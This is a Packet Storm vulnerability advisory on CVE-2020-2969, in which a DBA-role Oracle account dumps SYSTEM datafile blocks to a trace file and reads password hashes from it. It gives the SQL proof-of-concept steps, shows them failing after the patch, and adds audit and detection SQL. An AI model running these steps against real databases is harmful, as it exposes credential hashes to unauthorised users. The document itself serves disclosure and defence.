Packet Storm, PACKETSTORM:179027 (packetstormsecurity.com), Jun 11, 2024
Author: Emad Al-Mousa

Oracle Database Password Hash Unauthorized Access

Tags: cve-2020-2969, oracle database, unauthorized access, password hashes, data pump, dba role, vulnerability, high privileged attacker, network access, oracle net, security enhancement, proof of concept, simulation, oracle non-cdb, cdb setup, insufficient privileges, trace file, datafile, patch, enterprise edition

CVSS2: 6 Medium (AV:N/AC:M/Au:S/C:P/I:P/A:P)
  Attack Vector: NETWORK | Attack Complexity: MEDIUM | Authentication: SINGLE
  Confidentiality Impact: PARTIAL | Integrity Impact: PARTIAL | Availability Impact: PARTIAL

CVSS3: 6.6 Medium (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: NETWORK | Attack Complexity: HIGH | Privileges Required: HIGH | User Interaction: NONE
  Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

AI Score: 7 High (Confidence: Low)
EPSS: 0.001 Low (Percentile: 40.9%)

Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Risk Level: Medium  
Solution Status: Fixed  
CVE Reference: CVE-2020-2969  
Base Score: 6.6   
Author of Advisory: Emad Al-Mousa  
  
  
*****************************************  
Vulnerability Details:  
  
Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.  
  
The presented scenario illustrates that an account holding the "DBA" role can still view and extract password hashes even though it can no longer query SYS.USER$ directly: as a security enhancement introduced in Oracle Database 12c, the "select any dictionary" system privilege no longer grants access to SYS.USER$.  
  
*****************************************  
Proof of Concept (PoC):  
  
This simulation was performed in an Oracle non-CDB environment; the same steps apply in a CDB setup.  
  
SQL> create user ninja identified by hello_123;  
  
  
SQL> grant create session to ninja;  
  
  
SQL> grant dba to ninja;  
  
  
SQL> alter user ninja default role all;  
  
  
*** Selecting from SYS.USER$ fails for this account: the "SELECT ANY DICTIONARY" system privilege was changed to exclude direct access to several SYS tables, including USER$, ENC$, DEFAULT_PWD$, LINK$, USER_HISTORY$ and CDB_LOCAL_ADMINAUTH$  
  
SQL> select * from sys.user$;  
select * from sys.user$  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
** Instead, I dump a range of blocks from datafile 1 (the SYSTEM tablespace, which holds SYS.USER$) into a trace file to reach the hashed passwords  
  
SQL> alter system dump datafile 1 block min 210 block max 215;  
  
** Then I immediately look up the name of the trace file that was generated:  
  
SQL> select * from v$diag_info where NAME='Default Trace File';  
  
** Next I query the PAYLOAD column of the view V$DIAG_TRACE_FILE_CONTENTS, which reads the generated trace file's contents from inside the database:  
  
SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';  
  
// the password hashes are exposed in the trace file!  
  
After applying the Oracle July 2020 CPU patch, the simulation is repeated:  
  
SQL> create user ninja identified by hello_123;  
  
  
SQL> grant create session to ninja;  
  
  
SQL> grant dba to ninja;  
  
  
SQL> alter user ninja default role all;  
  
  
SQL> show user  
USER is "NINJA"  
  
SQL> select * from sys.user$;  
select * from sys.user$  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
  
SQL> alter system dump datafile 1 block min 210 block max 215;  
alter system dump datafile 1 block min 210 block max 215  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges  
  
SQL> select * from v$diag_info where NAME='Default Trace File';  
  
INST_ID NAME  
---------- ----------------------------------------------------------------  
VALUE  
--------------------------------------------------------------------------------  
CON_ID  
----------  
1 Default Trace File  
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc  
  
  
SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';  
  
PAYLOAD  
--------------------------------------------------------------------------------  
Trace file   
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc  
  
Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production  
Version 19.8.0.0.0  
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702  
ORACLE_HOME: /oraclex/oradbp05/product/19.3  
System name: Linux  
Node name: boba  
Release: 3.10.0-1127.13.1.el7.x86_64  
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020  
  
PAYLOAD  
--------------------------------------------------------------------------------  
Machine: x86_64  
Instance name: ora5  
Redo thread mounted by this instance: 1  
Oracle process number: 69  
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)  
  
  
*** 2020-07-16T11:09:31.240875+03:00  
  
*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00  
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00  
  
PAYLOAD  
--------------------------------------------------------------------------------  
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00  
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00  
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00  
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00  
  
Error: file 1 can only be dumped with SYSDBA privillege  
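As an added example that is not part of the original advisory, the SQL below shows the checks and the audit configuration a DBA would put around this issue. It assumes an Oracle Database 19c instance with unified auditing enabled, a session connected AS SYSDBA, and the hypothetical policy name DBA_DUMP_POL (chosen here, not from the advisory): it lists who holds the DBA role and who can connect AS SYSDBA, checks which Release Update the SQL patch registry records, audits every ALTER SYSTEM so that a block dump of datafile 1 is recorded whether it succeeds or fails, and hunts for such dumps in the unified audit trail.

```sql
-- Added example, not from the advisory. Assumes Oracle Database 19c with unified
-- auditing enabled, run as SYS AS SYSDBA. DBA_DUMP_POL is a hypothetical policy name.

-- 1. Accounts that hold the DBA role (the privilege level the PoC starts from).
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;

-- 2. Accounts that can connect AS SYSDBA. After the fix, only these can dump file 1,
--    so this list is the real attack surface for the trace-file path.
SELECT username, sysdba, sysoper
FROM   v$pwfile_users;

-- 3. Which Release Update is recorded? The patched run in the advisory shows build
--    label RDBMS_19.8.0.0.0DBRU; an RU at or above 19.8 carries the July 2020 CPU fix.
SELECT patch_id, patch_type, description, status, action_time
FROM   dba_registry_sqlpatch
ORDER  BY action_time DESC;

-- 4. Record every ALTER SYSTEM statement (ALTER SYSTEM DUMP DATAFILE included).
--    AUDIT POLICY without a BY clause applies to all users, SYS included, and
--    records both successful and failed attempts.
CREATE AUDIT POLICY dba_dump_pol
  ACTIONS ALTER SYSTEM;

AUDIT POLICY dba_dump_pol;

-- 5. Hunt for block dumps of datafile 1 in the unified audit trail.
--    REGEXP_LIKE with the 'i' flag tolerates case and spacing differences in the
--    captured statement text.
SELECT event_timestamp, dbusername, action_name, return_code, sql_text
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%DBA_DUMP_POL%'
AND    REGEXP_LIKE(sql_text, 'dump\s+datafile\s+1(\s|$)', 'i')
ORDER  BY event_timestamp;
```

With the policy in place, the advisory's post-patch attempt by NINJA leaves a row with ACTION_NAME ALTER SYSTEM and a non-zero RETURN_CODE (the ORA-01031 shown above), which is the event to alert on; the same statement from a non-SYSDBA account with RETURN_CODE 0 is the unpatched, exploitable condition.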
  
  
  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://www.oracle.com/security-alerts/cpujul2020verbose.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2969  
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/  
  
  
  
